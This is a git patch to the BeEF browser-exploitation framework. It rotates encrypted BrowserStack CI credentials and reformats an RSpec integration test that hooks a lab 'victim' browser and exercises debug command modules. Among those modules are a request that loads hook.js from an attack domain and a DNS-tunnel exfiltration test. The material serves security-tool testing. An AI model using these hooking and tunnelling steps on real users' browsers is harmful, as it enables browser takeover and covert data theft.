From 0f14e4d3b735f96ffc04bc44fd15e24a0b5bf1d8 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Fri, 8 May 2020 10:28:49 +1000 Subject: [PATCH] Generated secure BrowserStack user + access key for beefproject/beef repo. Cleaned up some code. --- .travis.yml | 4 +- .../modules/debug/test_beef_debugs_spec.rb | 326 +++++++++--------- 2 files changed, 165 insertions(+), 165 deletions(-) diff --git a/.travis.yml b/.travis.yml index 4124f0dc7..40a26cb26 100644 --- a/.travis.yml +++ b/.travis.yml @@ -88,6 +88,6 @@ addons: - libcurl4-openssl-dev browserstack: username: - secure: "iAMhXloUy1qzn2mmUHWtbnuLQpoKL42VGpghC47Gu5gTpcfSeHGKKPE4y2ZWQ1piu3yzGeDhP8jaW03DPYye/bjaVbH60RHLAaoIAcFypX4ryPmr3Z5+wpky8RQQy34t4prFX1LURf7z2NQKmlkpT0Gvgus7sqLbuojWJeFyERQ1qJ5esbXEndDFYR7qbI/UKXyQAJ8uK62O44+GfHUXiKlcXJvI8VFUMWAmvoys4bu5y56K0dQbilUKwlSBebU28vjd7FZqzgz/xy0P1G3pwSJm2VTJlhQKggu3argMB9Njvx+K3knRpicoUjIfJ8N0VzLKVrNtO9Qj1FXa/sok+rdbpqe7ZPLfFbyEpUqV7n6MhESKmu7fTwBoVr7W6oPACOD8MI9KHwGGnTjibmrydqklDJF7Cfs4WvxEddN1V2N68MGPEHMmILz2kzTdX4ze22O+2i4ho/Z6MeLfKFdlmZjYkaH0yKV7TTvsz1WOEGnVI6m0v7btI/1EM0iM533FIlyYtkTfNZTbpQBSwTEqZxbAejKZ49I8w+uH3ZvKpz+woDBTuFPgRAzbRZccqyOyTLs1iS3x1qCiQy5EW4ZMluU/GgglG/SyKRTfC7KSrKwyygP4VLGGzckiHd7lq2jeOa8vw7DqMu08IM/EY5OkCLFB5P3+//QvTOsO5q1qR0s=" + secure: "Yj+a2jY56dFqJwXdU6JdSXeKhhS01CiToBoB922SXVnA2D2WclGOFiTi0YrkAS9PuOJX5AjC9eUw7VFUcp8DiLmeDGLWo8klYrWQoJOH55FmSWKjdkqDopJFYr0ZXk/ZuXzzpuMvKkCT5MGFnySXyheTW8aUj33GetJ6/sNq5BoA36jH04OE3iPgdBaFPRNDVXEIWLaLUDQsAyZsHNNYC+/cj3cxjXLHu+mbNuXsXEHgrHJ2A94EWdrdGODWL8mRtlSDNkIaYHZKCBnUlHWwCwBitLsjhzdy0YFrIGVbX96FV+C41sjPWLFjZhjAaNDuJ3FoTplbzFNvrw5oxQAAI8ZZqUwF4MRIrQbN8BLFVISX7JooQjfyrNVWvhpZWGPB4GZTN4CThrlQ7G7CJRYDVyqZ7nen6y0+osBr9DRKN+EemlVG73aNP3mXaZr6BmS1BpQJ6tlqDdLCvC5j/PdguKwvt4EmgHA8Pzn20UElV+8BPblcYGjsWplk/cxW1adW0pu2vIxskKxDKJ/ReY3l5yUpiQPZHbuMidq2ffSX0B3yALe7vx+3AvMb2Fk9yWh52EVJXPkVlLvhP7wDd22MHCemvrC2nLhkVR4MglLWs7dZKHswExlKJdWK4OSXprOStjZSA47sjF2nPdztWTpdI77SKaBcoLGR5WOV+JtcQgk=" access_key: - secure: "qoDu6CKFgiPY9jQXNQ/XJ30x9sX2vfZ+KPca76sH0ELrSPw/rQDtC7L7w/NjwLxtgcGjxhfRL3uSqN8CZjCrxDUV5GKu/hWf4LXqzJqctXO7WFpC+YW7oPDhpKueJ4unAlQ68JKOrouHOcL3ZHoDLhAdQLJCVrbyq7hG/syNlOFvEFCrBN3exd+/NuVWE8NmuKTaONqsnD48hujvrAeNNmedZ3XQ3Wq/a08B/qiCrhTnVqSc9U9xTFGmvPAPwTXydT19gbsVoXt6fQpoWwaOiMe7zfkgW6OkeOye1Fg92G2lWJurVkgqECvC0mx9Z06SdHs5488mtDh0qhVWaCZea22iTAW4iPtGJrdquShLZJIMeQw8LqZPZXYfETb67cNL255t9AiAdKfUvUSk2R+cGNzHJH5ZdhxOUzDTvJsy0NL198/VhlVX/itcojl0bAbynQlhr2EALfPvl0TCvffKDig0vRmbXgvRt5M2crSeIy5UoESOUDOG5FHWrHKoYErdi58fiVbf8Ad38C4f8vqwqFHSnHkSQq+oTp0IndCH0N73PrrvTNHcBzwPGJU7l+0mQqd4tGbaEFnzMT3zkaC5f1/oRqRrdbEpOlRVkbIeIM3BrRVnC7O7C8aDnrJ6rOfNYHst7gp9sfx4hYmJcmZm0RAYnP7ObpWYJUi5a2lYipU=" \ No newline at end of file + secure: "KHlR8NHPnoF9U1CJKgUhS1YhPSeTILI2lIu+JilQ5Xeo7rcbWg9lT2xwQQNnLYrISG1vC6OzsbkcnC/3ZnAv7jYff4iUTc3Syszs5wIhhvnhBx4qCxM+/UD78TJNQ0AuY7NOIK6OXcmwbpZrOBUojZkooEkc8bpG56nb2v7dOIafFLV+tv9xcc5DtMSfh7FavhqRFRO+PCybqOW8yWMc2NiMYy3p9jKBC3qYRqme4hx1NRrLo5BZQ+UIcO3Rf+vAjUP+3gGuhWeu2kDCvZYDnI2GN1/WacRVY2cqDPGiYlD6pHNMqU0raYKyWdK0QD4KwYpfjxBGRmwBfz8xU8KWUEZ3P11mJn+BvIt0qe3VpomR0/60/fok1BEso3nea8oENXur5G/5SOfpkPLjzd4P4f7JYnST1PeeWwpzV305wktDv9aLc+Ne9cFCaxSaaCnOk82rKDhtnktwnK7krFj1lM6oygtOD+arAytPKaURRgV2izaoophiXuLFb+9XKSkMGtJ3e+rQATonnDPaFTzouKaXSEPxZQQ2bnsp9tETAReDrYIwPHuYL778UbbBICgNk54CZSfTeRFLroRGNPb/0gPXbu6SryPnknfCMNd7ksSndVoyKsDo1plTHQJGVweP2hxR3R/9syk9Z6DU6H5H3dc/RbkkmoRPVooUtR/mZ/c=" \ No newline at end of file diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index f0949007d..85ee3c999 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -11,205 +11,205 @@ require_relative '../../../support/beef_test' RSpec.describe 'BeEF Debug Command Modules:', :run_on_browserstack => true do before(:all) do - # Grab config and set creds in variables for ease of access - @config = BeEF::Core::Configuration.instance - @username = @config.get('beef.credentials.user') - @password = @config.get('beef.credentials.passwd') + # Grab config and set creds in variables for ease of access + @config = BeEF::Core::Configuration.instance + @username = @config.get('beef.credentials.user') + @password = @config.get('beef.credentials.passwd') - # Load BeEF extensions and modules - # Always load Extensions, as previous changes to the config from other tests may affect - # whether or not this test passes. - print_info "Loading in BeEF::Extensions" - BeEF::Extensions.load - sleep 2 + # Load BeEF extensions and modules + # Always load Extensions, as previous changes to the config from other tests may affect + # whether or not this test passes. + print_info "Loading in BeEF::Extensions" + BeEF::Extensions.load + sleep 2 - # Check if modules already loaded. No need to reload. - if @config.get('beef.module').nil? - print_info "Loading in BeEF::Modules" - BeEF::Modules.load - - sleep 2 - else - print_info "Modules already loaded" - end - - # Grab DB file and regenerate if requested - print_info "Loading database" - db_file = @config.get('beef.database.file') - - if BeEF::Core::Console::CommandLine.parse[:resetdb] - print_info 'Resetting the database for BeEF.' - File.delete(db_file) if File.exists?(db_file) - end - - # Load up DB and migrate if necessary - ActiveRecord::Base.logger = nil - OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] - OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database: db_file) - - context = ActiveRecord::Migration.new.migration_context - if context.needs_migration? - ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate - end + # Check if modules already loaded. No need to reload. + if @config.get('beef.module').nil? + print_info "Loading in BeEF::Modules" + BeEF::Modules.load sleep 2 + else + print_info "Modules already loaded" + end - BeEF::Core::Migration.instance.update_db! - - # Spawn HTTP Server - print_info "Starting HTTP Hook Server" - http_hook_server = BeEF::Core::Server.instance - http_hook_server.prepare + # Grab DB file and regenerate if requested + print_info "Loading database" + db_file = @config.get('beef.database.file') - # Generate a token for the server to respond with - @token = BeEF::Core::Crypto::api_token - - # Initiate server start-up - @pids = fork do - BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) + if BeEF::Core::Console::CommandLine.parse[:resetdb] + print_info 'Resetting the database for BeEF.' + File.delete(db_file) if File.exists?(db_file) + end + + # Load up DB and migrate if necessary + ActiveRecord::Base.logger = nil + OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] + OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database: db_file) + + context = ActiveRecord::Migration.new.migration_context + if context.needs_migration? + ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate + end + + sleep 2 + + BeEF::Core::Migration.instance.update_db! + + # Spawn HTTP Server + print_info "Starting HTTP Hook Server" + http_hook_server = BeEF::Core::Server.instance + http_hook_server.prepare + + # Generate a token for the server to respond with + @token = BeEF::Core::Crypto::api_token + + # Initiate server start-up + @pids = fork do + BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) + end + @pid = fork do + http_hook_server.start + end + + # Give the server time to start-up + sleep 1 + + @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) + @caps["name"] = self.class.description || ENV['name'] || 'no-name' + @caps["browserstack.local"] = true + @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] + + @driver = Selenium::WebDriver.for(:remote, + :url => "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", + :desired_capabilities => @caps) + + # Hook new victim + print_info 'Hooking a new victim, waiting a few seconds...' + wait = Selenium::WebDriver::Wait.new(:timeout => 30) # seconds + + @driver.navigate.to "#{VICTIM_URL}" + + sleep 3 + + # Give time for browser hook to occur + sleep 1 until wait.until { @driver.execute_script("return window.beef.session.get_hook_session_id().length") > 0} + + begin + @hooks = JSON.parse(RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}") + if @hooks['hooked-browsers']['online'].empty? + puts @hooks['hooked-browsers']['online'] + @session = @hooks['hooked-browsers']['online']['0']['session'] + else + @session = @driver.execute_script("return window.beef.session.get_hook_session_id()") end - @pid = fork do - http_hook_server.start - end - - # Give the server time to start-up - sleep 1 + rescue => exception + print_info "Encountered Exception: #{exception}" + print_info "Continuing to grab Session ID from client" + @session = @driver.execute_script("return window.beef.session.get_hook_session_id()") + end - @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) - @caps["name"] = self.class.description || ENV['name'] || 'no-name' - @caps["browserstack.local"] = true - @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] - - @driver = Selenium::WebDriver.for(:remote, - :url => "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", - :desired_capabilities => @caps) - - # Hook new victim - print_info 'Hooking a new victim, waiting a few seconds...' - wait = Selenium::WebDriver::Wait.new(:timeout => 30) # seconds - - @driver.navigate.to "#{VICTIM_URL}" - - sleep 3 - - # Give time for browser hook to occur - sleep 1 until wait.until { @driver.execute_script("return window.beef.session.get_hook_session_id().length") > 0} - - begin - @hooks = JSON.parse(RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}") - if @hooks['hooked-browsers']['online'].empty? - puts @hooks['hooked-browsers']['online'] - @session = @hooks['hooked-browsers']['online']['0']['session'] - else - @session = @driver.execute_script("return window.beef.session.get_hook_session_id()") - end - rescue => exception - print_info "Encountered Exception: #{exception}" - print_info "Continuing to grab Session ID from client" - @session = @driver.execute_script("return window.beef.session.get_hook_session_id()") - end - - # Grab Command Module IDs as they can differ from machine to machine - @debug_mod_ids = JSON.parse(RestClient.get "#{RESTAPI_MODULES}?token=#{@token}") - @debug_mod_names_ids = {} - @debug_mods = @debug_mod_ids.to_a.select { |cmd_mod| cmd_mod[1]['category'] == 'Debug' } - .map do |debug_mod| - @debug_mod_names_ids[debug_mod[1]['class']] = debug_mod[1]['id'] - end + # Grab Command Module IDs as they can differ from machine to machine + @debug_mod_ids = JSON.parse(RestClient.get "#{RESTAPI_MODULES}?token=#{@token}") + @debug_mod_names_ids = {} + @debug_mods = @debug_mod_ids.to_a.select { |cmd_mod| cmd_mod[1]['category'] == 'Debug' } + .map do |debug_mod| + @debug_mod_names_ids[debug_mod[1]['class']] = debug_mod[1]['id'] + end end after(:all) do - @driver.quit + @driver.quit - print_info "Shutting down server" - Process.kill("KILL",@pid) - Process.kill("KILL",@pids) + print_info "Shutting down server" + Process.kill("KILL",@pid) + Process.kill("KILL",@pids) end it 'The Test_beef.debug() command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_beef_debug'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { "msg": "test" }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_beef_debug'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { "msg": "test" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Return ASCII Characters command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_return_ascii_chars'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_return_ascii_chars'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Return Image command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_return_image'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_return_image'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Test HTTP Redirect command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_http_redirect'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_http_redirect'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Test Returning Results/Long String command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_return_long_string'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { "repeat": 20, - "repeat_string": "beef" }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_return_long_string'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { "repeat": 20, + "repeat_string": "beef" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Test Network Request command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_network_request'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { "scheme": "http", - "method": "GET", - "domain": "#{ATTACK_DOMAIN}", - "port": "#{@config.get('beef.http.port')}", - "path": "/hook.js", - "anchor": "anchor", - "data": "query=testquerydata", - "timeout": "10", - "dataType": "script" }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_network_request'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { "scheme": "http", + "method": "GET", + "domain": "#{ATTACK_DOMAIN}", + "port": "#{@config.get('beef.http.port')}", + "path": "/hook.js", + "anchor": "anchor", + "data": "query=testquerydata", + "timeout": "10", + "dataType": "script" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Test DNS Tunnel command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_dns_tunnel_client'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { "domain": "example.com", - "data": "Lorem ipsum" }.to_json, - :content_type => :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_dns_tunnel_client'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { "domain": "example.com", + "data": "Lorem ipsum" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end it 'The Test CORS Request command module successfully executes' do - cmd_mod_id = @debug_mod_names_ids['Test_cors_request'] - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", - { "method": "GET", - "url": "example.com", - "data": { - "test": "data" - }}.to_json, - content_type: :json - result_data = JSON.parse(response.body) - expect(result_data['success']).to eq "true" + cmd_mod_id = @debug_mod_names_ids['Test_cors_request'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", + { "method": "GET", + "url": "example.com", + "data": { + "test": "data" + }}.to_json, + content_type: :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" end end